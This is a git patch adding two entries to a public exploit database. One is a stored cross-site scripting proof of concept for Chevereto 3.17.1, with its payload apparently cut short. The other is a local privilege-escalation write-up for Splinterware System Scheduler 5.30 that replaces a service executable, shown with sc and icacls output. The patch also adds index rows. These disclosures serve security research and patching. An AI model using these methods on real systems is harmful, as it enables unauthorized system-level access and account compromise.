From 46c569f0e475f821955ff9fb0bea65a52d4f3fa9 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 13 May 2021 05:01:53 +0000 Subject: [PATCH] DB: 2021-05-13 2 changes to exploits/shellcodes Splinterware System Scheduler Professional 5.30 - Privilege Escalation Chevereto 3.17.1 - Cross Site Scripting (Stored) --- exploits/multiple/webapps/49859.txt | 14 +++++++++ exploits/windows/local/49858.txt | 48 +++++++++++++++++++++++++++++ files_exploits.csv | 2 ++ 3 files changed, 64 insertions(+) create mode 100644 exploits/multiple/webapps/49859.txt create mode 100644 exploits/windows/local/49858.txt diff --git a/exploits/multiple/webapps/49859.txt b/exploits/multiple/webapps/49859.txt new file mode 100644 index 000000000..13312e07e --- /dev/null +++ b/exploits/multiple/webapps/49859.txt @@ -0,0 +1,14 @@ +# Exploit Title: Chevereto 3.17.1 - Cross Site Scripting (Stored) +# Google Dork: "powered by chevereto" +# Date: 19.04.2021 +# Exploit Author: Akıner Kısa +# Vendor Homepage: https://chevereto.com/ +# Software Link: https://chevereto.com/releases +# Version: 3.17.1 +# Tested on: Windows 10 / Xampp + +Proof of Concept: + +1. Press the Upload image button and upload any image. +2. After uploading the image, press the pencil icon on the top right of the image and write "> instead of the title. +3. Upload the picture and go to the picture address. \ No newline at end of file diff --git a/exploits/windows/local/49858.txt b/exploits/windows/local/49858.txt new file mode 100644 index 000000000..72fe92d7b --- /dev/null +++ b/exploits/windows/local/49858.txt @@ -0,0 +1,48 @@ +# Exploit Title: Splinterware System Scheduler Professional 5.30 - Privilege Escalation +# Date: 2021-05-11 +# Exploit Author: Andrea Intilangelo +# Vendor Homepage: https://www.splinterware.com +# Software Link: https://www.splinterware.com/download/ssproeval.exe +# Version: 5.30 Professional +# Tested on: Windows 10 Pro 20H2 x64 + +System Scheduler Professional 5.30 is subject to privilege escalation due to insecure file permissions, impacting +where the service 'WindowsScheduler' calls its executable. A non-privileged user could execute arbitrary code with +elevated privileges (system level privileges as "nt authority\system") since the service runs as Local System; +renaming the WService.exe file located in the software's path and replacing it with a malicious file, the new one +will be executed after a short while. + +C:\Users\test>sc qc WindowsScheduler +[SC] QueryServiceConfig OPERAZIONI RIUSCITE + +NOME_SERVIZIO: WindowsScheduler + TIPO : 10 WIN32_OWN_PROCESS + TIPO_AVVIO : 2 AUTO_START + CONTROLLO_ERRORE : 0 IGNORE + NOME_PERCORSO_BINARIO : C:\PROGRA~2\SYSTEM~1\WService.exe + GRUPPO_ORDINE_CARICAMENTO : + TAG : 0 + NOME_VISUALIZZATO : System Scheduler Service + DIPENDENZE : + SERVICE_START_NAME : LocalSystem + +C:\Users\test>icacls C:\PROGRA~2\SYSTEM~1\ +C:\PROGRA~2\SYSTEM~1\ BUILTIN\Users:(RX,W) + BUILTIN\Users:(OI)(CI)(IO)(GR,GW,GE) + NT SERVICE\TrustedInstaller:(I)(F) + NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F) + NT AUTHORITY\SYSTEM:(I)(F) + NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F) + BUILTIN\Administrators:(I)(F) + BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) + BUILTIN\Users:(I)(RX) + BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE) + CREATOR OWNER:(I)(OI)(CI)(IO)(F) + AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(RX) + AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(OI)(CI)(IO)(GR,GE) + AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(RX) + AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(OI)(CI)(IO)(GR,GE) + +Elaborazione completata per 1 file. Elaborazione non riuscita per 0 file + +C:\Users\test> \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 6f309a4f9..582e408d6 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11324,6 +11324,7 @@ id,file,description,date,author,type,platform,port 49851,exploits/windows/local/49851.txt,"BOOTP Turbo 2.0.0.1253 - 'bootpt.exe' Unquoted Service Path",2021-05-10,"Erick Galindo",local,windows, 49852,exploits/windows/local/49852.txt,"TFTP Broadband 4.3.0.1465 - 'tftpt.exe' Unquoted Service Path",2021-05-10,"Erick Galindo",local,windows, 49857,exploits/windows/local/49857.txt,"Odoo 12.0.20190101 - 'nssm.exe' Unquoted Service Path",2021-05-11,1F98D,local,windows, +49858,exploits/windows/local/49858.txt,"Splinterware System Scheduler Professional 5.30 - Privilege Escalation",2021-05-12,"Andrea Intilangelo",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -44023,3 +44024,4 @@ id,file,description,date,author,type,platform,port 49853,exploits/php/webapps/49853.txt,"PHP Timeclock 1.04 - 'Multiple' Cross Site Scripting (XSS)",2021-05-10,"Tyler Butler",webapps,php, 49854,exploits/php/webapps/49854.txt,"Human Resource Information System 0.1 - 'First Name' Persistent Cross-Site Scripting (Authenticated)",2021-05-10,"Reza Afsahi",webapps,php, 49856,exploits/php/webapps/49856.py,"Microweber CMS 1.1.20 - Remote Code Execution (Authenticated)",2021-05-10,sl1nki,webapps,php, +49859,exploits/multiple/webapps/49859.txt,"Chevereto 3.17.1 - Cross Site Scripting (Stored)",2021-05-12,"Akıner Kısa",webapps,multiple,